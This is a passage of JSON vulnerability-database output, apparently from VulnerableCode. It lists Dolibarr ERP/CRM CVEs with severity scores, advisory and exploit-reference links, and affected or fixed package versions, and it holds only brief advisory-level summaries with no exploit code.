CID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.1"}],"aliases":["CVE-2022-0819","GHSA-42qm-c3cf-9wv2"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3ny3-rj44-ffgf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/303482?format=json","vulnerability_id":"VCID-3ust-28tv-mkd5","summary":"","references":[{"reference_url":"http://packetstormsecurity.com/files/150623/Dolibarr-ERP-CRM-8.0.3-Cross-Site-Scripting.html","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://packetstormsecurity.com/files/150623/Dolibarr-ERP-CRM-8.0.3-Cross-Site-Scripting.html"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2018-19799","reference_id":"","reference_type":"","scores":[{"value":"0.0218","scoring_system":"epss","scoring_elements":"0.84716","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2018-19799"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2018-19799","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2018-19799"},{"reference_url":"https://pentest.com.tr/exploits/Dolibarr-ERP-CRM-8-0-3-Cross-Site-Scripting.html","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://pentest.com.tr/exploits/Dolibarr-ERP-CRM-8-0-3-Cross-Site-Scripting.html"},{"reference_url":"https://www.exploit-db.com/exploits/45945","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.exploit-db.com/exploits/45945"},{"reference_url":"https://www.exploit-db.com/exploits/45945/","reference_id":"","reference_type":"","scores":[],"url":"https://www.exploit-db.com/exploits/45945/"},{"reference_url":"https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/php/webapps/45945.txt","reference_id":"CVE-2018-19799","reference_type":"exploit","scores":[],"url":"https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/php/webapps/45945.txt"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/385164?format=json","purl":"pkg:composer/dolibarr/dolibarr@8.0.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-2fk1-fu91-kfh1"},{"vulnerability":"VCID-2p7p-cynw-77ej"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-54b5-vj66-ayeu"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-73pa-djjd-4ufu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-et1a-rh8j-17ad"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-f96a-99zf-kfcf"},{"vulnerability":"VCID-fyuf-7bvy-b3am"},{"vulnerability":"VCID-gk4m-a13r-ekd6"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kk1j-umud-wkdn"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-nn71-z52s-u7g9"},{"vulnerability":"VCID-p7h1-ceff-pfhu"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-szp5-96ea-jua5"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-x7qz-jffh-9ydk"},{"vulnerability":"VCID-y2yy-zrhp-rba3"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@8.0.4"}],"aliases":["CVE-2018-19799","GHSA-ggww-q2gv-m3g4"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3ust-28tv-mkd5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/71473?format=json","vulnerability_id":"VCID-44tq-zhx1-8beb","summary":"In Dolibarr ERP & CRM <= 22.0.4, PHP code detection and editing permission enforcement in the Website module is not applied consistently to all input parameters, allowing an authenticated user restricted to HTML/JavaScript editing to inject PHP code through unprotected inputs during website page creation.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31018","reference_id":"","reference_type":"","scores":[{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.15502","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31018"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/ba28d16da4cc0c221f49a878fecc8425501ceb96","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/ba28d16da4cc0c221f49a878fecc8425501ceb96"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31018","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31018"},{"reference_url":"http://dolibarr.com","reference_id":"dolibarr.com","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T15:30:39Z/"}],"url":"http://dolibarr.com"},{"reference_url":"https://github.com/advisories/GHSA-676v-wh57-p375","reference_id":"GHSA-676v-wh57-p375","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-676v-wh57-p375"},{"reference_url":"https://github.com/PhDg1410/CVE/blob/main/CVE-2026-31018/README.md","reference_id":"README.md","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T15:30:39Z/"}],"url":"https://github.com/PhDg1410/CVE/blob/main/CVE-2026-31018/README.md"}],"fixed_packages":[],"aliases":["CVE-2026-31018","GHSA-676v-wh57-p375"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-44tq-zhx1-8beb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/47988?format=json","vulnerability_id":"VCID-4cfp-8g13-k7bd","summary":"Lack of sanitization during Installation Process in Dolibarr ERP CRM up to version 19.0.0 allows an attacker with adjacent access to the network to execute arbitrary code via a specifically crafted input.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-29477","reference_id":"","reference_type":"","scores":[{"value":"0.00165","scoring_system":"epss","scoring_elements":"0.37293","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-29477"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-29477","reference_id":"CVE-2024-29477","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-29477"},{"reference_url":"https://github.com/alexbsec/CVEs/blob/master/2024/CVE-2024-29477.md","reference_id":"CVE-2024-29477.md","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-04-03T14:57:17Z/"}],"url":"https://github.com/alexbsec/CVEs/blob/master/2024/CVE-2024-29477.md"},{"reference_url":"http://dolibarr.com","reference_id":"dolibarr.com","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-04-03T14:57:17Z/"}],"url":"http://dolibarr.com"},{"reference_url":"https://github.com/advisories/GHSA-p73x-rpgm-3v56","reference_id":"GHSA-p73x-rpgm-3v56","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-p73x-rpgm-3v56"}],"fixed_packages":[],"aliases":["CVE-2024-29477","GHSA-p73x-rpgm-3v56"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"7.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4cfp-8g13-k7bd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/301996?format=json","vulnerability_id":"VCID-53d8-7k7n-vud1","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2018-16808","reference_id":"","reference_type":"","scores":[{"value":"0.00199","scoring_system":"epss","scoring_elements":"0.41988","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2018-16808"},{"reference_url":"https://github.com/Dolibarr/dolibarr/issues/9449","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/issues/9449"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2018-16808","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2018-16808"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/386571?format=json","purl":"pkg:composer/dolibarr/dolibarr@7.0.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-2fk1-fu91-kfh1"},{"vulnerability":"VCID-2p7p-cynw-77ej"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-3ust-28tv-mkd5"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-54b5-vj66-ayeu"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-73pa-djjd-4ufu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-dzuu-tkyp-8udb"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-et1a-rh8j-17ad"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-f96a-99zf-kfcf"},{"vulnerability":"VCID-fyuf-7bvy-b3am"},{"vulnerability":"VCID-gk4m-a13r-ekd6"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kk1j-umud-wkdn"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-nn71-z52s-u7g9"},{"vulnerability":"VCID-p7h1-ceff-pfhu"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-qumf-2xyz-tqe5"},{"vulnerability":"VCID-qzu2-uf2r-yydt"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-szp5-96ea-jua5"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-w6uz-k9fr-jkdr"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-x7qz-jffh-9ydk"},{"vulnerability":"VCID-y2yy-zrhp-rba3"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.1"}],"aliases":["CVE-2018-16808","GHSA-r3r5-fqfm-9wrh"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-53d8-7k7n-vud1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/322517?format=json","vulnerability_id":"VCID-54b5-vj66-ayeu","summary":"","references":[{"reference_url":"http://packetstormsecurity.com/files/161955/Dolibarr-ERP-CRM-11.0.4-Bypass-Code-Execution.html","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://packetstormsecurity.com/files/161955/Dolibarr-ERP-CRM-11.0.4-Bypass-Code-Execution.html"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-14209","reference_id":"","reference_type":"","scores":[{"value":"0.10166","scoring_system":"epss","scoring_elements":"0.93282","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-14209"},{"reference_url":"https://github.com/Dolibarr/dolibarr/releases/tag/11.0.5","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/releases/tag/11.0.5"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14209","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14209"},{"reference_url":"https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2020-012","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2020-012"},{"reference_url":"https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/php/webapps/49711.py","reference_id":"CVE-2020-14209","reference_type":"exploit","scores":[],"url":"https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/php/webapps/49711.py"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/384545?format=json","purl":"pkg:composer/dolibarr/dolibarr@11.0.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@11.0.5"}],"aliases":["CVE-2020-14209","GHSA-2gcp-xwxg-hqg3"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-54b5-vj66-ayeu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/174028?format=json","vulnerability_id":"VCID-5ykc-55w1-3ka4","summary":"Dolibarr ERP & CRM <=15.0.3 is vulnerable to Eval injection. By default, any administrator can be added to the installation page of dolibarr, and if successfully added, malicious code can be inserted into the database and then execute it by eval.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-40871","reference_id":"","reference_type":"","scores":[{"value":"0.51559","scoring_system":"epss","scoring_elements":"0.97953","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-40871"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-40871","reference_id":"CVE-2022-40871","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-40871"},{"reference_url":"https://github.com/youncyb/dolibarr-rce","reference_id":"dolibarr-rce","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-05-15T15:00:17Z/"}],"url":"https://github.com/youncyb/dolibarr-rce"},{"reference_url":"https://github.com/advisories/GHSA-7cm4-vmf2-8wf2","reference_id":"GHSA-7cm4-vmf2-8wf2","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7cm4-vmf2-8wf2"}],"fixed_packages":[],"aliases":["CVE-2022-40871","GHSA-7cm4-vmf2-8wf2"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5ykc-55w1-3ka4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/208266?format=json","vulnerability_id":"VCID-5ynu-3t27-kuhq","summary":"Improper Authorization in dolibarr/dolibarr","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0731","reference_id":"","reference_type":"","scores":[{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33182","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0731"},{"reference_url":"https://github.com/dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/209ab708d4b65fbd88ba4340d60b7822cb72651a","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr/commit/209ab708d4b65fbd88ba4340d60b7822cb72651a"},{"reference_url":"https://huntr.dev/bounties/e242ab4e-fc70-4b2c-a42d-5b3ee4895de8","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/e242ab4e-fc70-4b2c-a42d-5b3ee4895de8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0731","reference_id":"CVE-2022-0731","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0731"},{"reference_url":"https://github.com/advisories/GHSA-4xc7-x2jr-cr74","reference_id":"GHSA-4xc7-x2jr-cr74","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4xc7-x2jr-cr74"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/19494?format=json","purl":"pkg:composer/dolibarr/dolibarr@16.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-bjem-6exd-9kf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@16.0.0"}],"aliases":["CVE-2022-0731","GHSA-4xc7-x2jr-cr74"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5ynu-3t27-kuhq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/297453?format=json","vulnerability_id":"VCID-65zj-gtdx-7ydm","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2017-9840","reference_id":"","reference_type":"","scores":[{"value":"0.00698","scoring_system":"epss","scoring_elements":"0.72425","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2017-9840"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2017-9840","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2017-9840"},{"reference_url":"https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2017-009","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2017-009"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/384678?format=json","purl":"pkg:composer/dolibarr/dolibarr@5.0.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1nww-vebc-rfe7"},{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-2fk1-fu91-kfh1"},{"vulnerability":"VCID-2p7p-cynw-77ej"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vul